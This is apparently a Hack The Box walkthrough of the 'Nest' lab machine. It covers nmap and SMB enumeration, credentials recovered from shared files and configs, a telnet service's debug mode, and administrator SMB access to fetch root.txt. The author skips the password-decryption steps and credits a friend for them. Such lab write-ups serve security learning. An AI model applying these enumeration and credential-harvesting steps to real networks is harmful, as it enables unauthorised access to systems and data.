NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-30 10:15 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:15
Completed NSE at 10:15, 0.00s elapsed
Initiating NSE at 10:15
Completed NSE at 10:15, 0.00s elapsed
Initiating NSE at 10:15
Completed NSE at 10:15, 0.00s elapsed
Initiating Ping Scan at 10:15
Scanning 10.10.10.178 [4 ports]
Completed Ping Scan at 10:15, 0.48s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:15
Completed Parallel DNS resolution of 1 host. at 10:15, 0.19s elapsed
Initiating SYN Stealth Scan at 10:15
Scanning 10.10.10.178 [1000 ports]
Discovered open port 445/tcp on 10.10.10.178
Completed SYN Stealth Scan at 10:15, 23.02s elapsed (1000 total ports)
Initiating Service scan at 10:15
Scanning 1 service on 10.10.10.178
Completed Service scan at 10:15, 30.67s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 10.10.10.178
Retrying OS detection (try #2) against 10.10.10.178
Initiating Traceroute at 10:16
Completed Traceroute at 10:16, 0.71s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 10:16
Completed Parallel DNS resolution of 2 hosts. at 10:16, 0.38s elapsed
NSE: Script scanning 10.10.10.178.
Initiating NSE at 10:16
Completed NSE at 10:16, 40.08s elapsed
Initiating NSE at 10:16
Completed NSE at 10:16, 0.66s elapsed
Initiating NSE at 10:16
Completed NSE at 10:16, 0.00s elapsed
Nmap scan report for 10.10.10.178
Host is up (0.48s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.020 days (since Sat May 30 09:47:48 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: Incremental
Host script results:
|_clock-skew: 4m24s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-05-30T04:50:32
|_ start_date: 2020-05-30T04:23:04
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 702.63 ms 10.10.14.1
2 703.27 ms 10.10.10.178
NSE: Script Post-scanning.
Initiating NSE at 10:16
Completed NSE at 10:16, 0.00s elapsed
Initiating NSE at 10:16
Completed NSE at 10:16, 0.00s elapsed
Initiating NSE at 10:16
Completed NSE at 10:16, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 102.35 seconds
Raw packets sent: 2100 (96.084KB) | Rcvd: 61 (4.750KB)
ENUMERATE SMB
root@liquid:~/Desktop/HTB/nest# smbclient -L 10.10.10.178
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
Secure$ Disk
Users Disk
SMB1 disabled -- no workgroup available
RANDOM DATA CHECKING IN SMB FILES
root@liquid:~/Desktop/HTB/nest# smbclient \\\\10.10.10.178\\Data
smb: \> cd Shared\Templates\HR\
smb: \Shared\Templates\HR\> ls
. D 0 Wed Aug 7 15:08:01 2019
.. D 0 Wed Aug 7 15:08:01 2019
Welcome Email.txt A 425 Wed Aug 7 18:55:36 2019
10485247 blocks of size 4096. 6544122 blocks available
smb: \Shared\Templates\HR\> mget "Welcome Email.txt"
Get file Welcome Email.txt? y
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (3.5 KiloBytes/sec) (average 3.5 KiloBytes/sec)
smb: \Shared\Templates\HR\> cd ../../Maintenance\
smb: \Shared\Maintenance\> mget "Maintenance Alerts.txt"
Get file Maintenance Alerts.txt? y
getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.4 KiloBytes/sec) (average 1.9 KiloBytes/sec)
TempUser : welcome2019
We have so many Files Under Data Folder So rather going one by one Lets grab them at once !!
root@liquid:~/Desktop/HTB/nest# smbget -R smb://10.10.10.178/Data/ -U TempUser
Password for [TempUser] connecting to //Data/10.10.10.178:
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Data//IT/Configs/Adobe/editing.xml
smb://10.10.10.178/Data//IT/Configs/Adobe/Options.txt
smb://10.10.10.178/Data//IT/Configs/Adobe/projects.xml
smb://10.10.10.178/Data//IT/Configs/Adobe/settings.xml
smb://10.10.10.178/Data//IT/Configs/Atlas/Temp.XML
smb://10.10.10.178/Data//IT/Configs/Microsoft/Options.xml
smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/config.xml
smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/shortcuts.xml
smb://10.10.10.178/Data//IT/Configs/RU Scanner/RU_config.xml
smb://10.10.10.178/Data//Shared/Maintenance/Maintenance Alerts.txt
smb://10.10.10.178/Data//Shared/Templates/HR/Welcome Email.txt
Downloaded 16.65kB in 81 seconds
After checking in all these files I got file!!
Data//IT/Configs/RU Scanner/RU_Config.xml
But this was in encrypted i tried to decrypt it online but nothing worked.
Then I proceeded further with Other files and got one more file named
Data//IT/Configs/NotepadPlusPlus/config.xml
So I directly I tried to open that file which we got above using TempUser And Downloaded all those files
root@liquid:~/Desktop/HTB/nest# smbget -rR smb://10.10.10.178/Secure$/IT/Carl/ -U TempUser
Password for [TempUser] connecting to //Secure$/10.10.10.178:
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Secure$/IT/Carl//Docs/ip.txt
smb://10.10.10.178/Secure$/IT/Carl//Docs/mmc.txt
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/ConfigFile.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Module1.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.myapp
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/AssemblyInfo.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.resx
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.settings
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj.user
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/SsoIntegration.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Proj
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner.sln
Downloaded 25.18kB in 79 seconds
Looking at this data, we find some interesting fode in Module1.vb and Utils.vb. As far as content we are interested in, Module1.vb uses Utils.vb to decrypt the password it retrieves from the RU_config.xml configuration file.
Here I took help of My friend who had alredy completed this
C.Smith : xRxRxPANCAK3SxRxRx
Lets Get user.txt
root@liquid:~/Desktop/HTB/nest# smbget -R smb://10.10.10.178/Users/C.Smith -U C.Smith
Password for [C.Smith] connecting to //Users/10.10.10.178:
Using workgroup WORKGROUP, user C.Smith
smb://10.10.10.178/Users/C.Smith/HQK Reporting/AD Integration Module/HqkLdap.exe
smb://10.10.10.178/Users/C.Smith/HQK Reporting/Debug Mode Password.txt
smb://10.10.10.178/Users/C.Smith/HQK Reporting/HQK_Config_Backup.xml
smb://10.10.10.178/Users/C.Smith/user.txt
After looking at this password file!!
cat Debug\ Mode\ Password.txt:Password
WBQ201953D8w
GETTING ROOT ACCESS
Lets Telnet Our IP to The Port we got in above files and during nmap!!
root@liquid:~/Desktop/HTB/nest# telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.
HQK Reporting Service V1.2
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
>ls
Unrecognised command
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[DIR] COMPARISONS
[1] Invoices (Ordered By Customer)
[2] Products Sold (Ordered By Customer)
[3] Products Sold In Last 30 Days
Current Directory: ALL QUERIES
>setdir 1
Error: The specified directory does not exist
>DEBUG WBQ201953D8w
Debug mode enabled. Use the HELP command to view additional commands that are now available
>setdir 1
Error: The specified directory does not exist
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[DIR] COMPARISONS
[1] Invoices (Ordered By Customer)
[2] Products Sold (Ordered By Customer)
[3] Products Sold In Last 30 Days
Current Directory: ALL QUERIES
>setdir 2
Error: The specified directory does not exist
>setdir ..
Current directory set to HQK
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[DIR] ALL QUERIES
[DIR] LDAP
[DIR] Logs
[1] HqkSvc.exe
[2] HqkSvc.InstallState
[3] HQK_Config.xml
Current Directory: HQK
>setdir LDAP
Current directory set to LDAP
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[1] HqkLdap.exe
[2] Ldap.conf
Current Directory: LDAP
>showquery 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
Here we got Our Password for Administrator but it is also encoded
Where I took help of my friend agai
My weak part is with Debugging
We just to debug the given exe files
and we will get our password
Administrator : XtH4nkS4Pl4y1nGX
Now let’s login using Administrator
root@liquid:~/Desktop/HTB/nest# smbclient \\\\10.10.10.178\\C$ -U Administrator
Enter WORKGROUP\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> cd Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> ls
. DR 0 Sun Jan 26 02:20:50 2020
.. DR 0 Sun Jan 26 02:20:50 2020
desktop.ini AHS 282 Sat Jan 25 17:02:44 2020
root.txt A 32 Mon Aug 5 18:27:26 2019
10485247 blocks of size 4096. 6544088 blocks available
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 32 as root.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
